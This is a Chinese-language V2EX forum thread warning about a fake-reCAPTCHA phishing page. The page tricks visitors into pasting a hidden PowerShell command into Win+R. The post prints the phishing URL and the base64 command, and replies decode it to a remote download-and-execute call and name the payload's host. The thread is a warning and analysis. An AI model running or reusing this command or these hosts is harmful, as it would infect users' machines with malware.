V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
20160409
V2EX  ›  信息安全

我也遇到了,让你执行 win+R 的钓鱼网站

  •  
  •   20160409 · 11 小时 55 分钟前 · 965 次点击

    弹窗广告,弹出了伪装 Google recaptcha 的验证界面,点击验证后变成图中这个、并把以下命令自动拷贝到了剪切板,让你执行。

    供各位把玩。

    ⚠除非你知道自己在干嘛,否则不要执行这个 powershell 命令。

    https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/CAptcha-verify-Approvals-system.html

    powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=

    5202517f5bb3c7124748d8d.png

    5 条回复    2024-10-15 22:20:51 +08:00
    colinlikepotatos
        1
    colinlikepotatos  
       11 小时 42 分钟前
    笑死,我 mac 打开的 都没识别一下
    iorilu
        2
    iorilu  
       11 小时 35 分钟前
    拿这行命令什么意思呢, pwsh 可以用 base64 编码得命令?
    CCddf
        3
    CCddf  
       11 小时 25 分钟前
    @iorilu iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

    iex Invoke-Expression Runs commands or expressions on the local computer.
    iwr Invoke-WebRequest Gets content from a web page on the internet.
    -UseBasicParsing This parameter has been deprecated. Beginning with PowerShell 6.0.0, all Web requests use basic parsing only. This parameter is included for backwards compatibility only and any use of it has no effect on the operation of the cmdlet.
    iqoo
        4
    iqoo  
       11 小时 15 分钟前
    收到过好几次,自称 github issue 回复的。连系统都不判断下,mac 系统发一个 exe 链接😂 给他压力测试了
    PrinceofInj
        5
    PrinceofInj  
       10 小时 5 分钟前
    解码了一下,实际是是下载 https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/leto15.zip 这个文件解压后执行,压缩包是啥就不知道了。不敢下载,怕被 IT 抓
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2706 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 21ms · UTC 00:26 · PVG 08:26 · LAX 17:26 · JFK 20:26
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.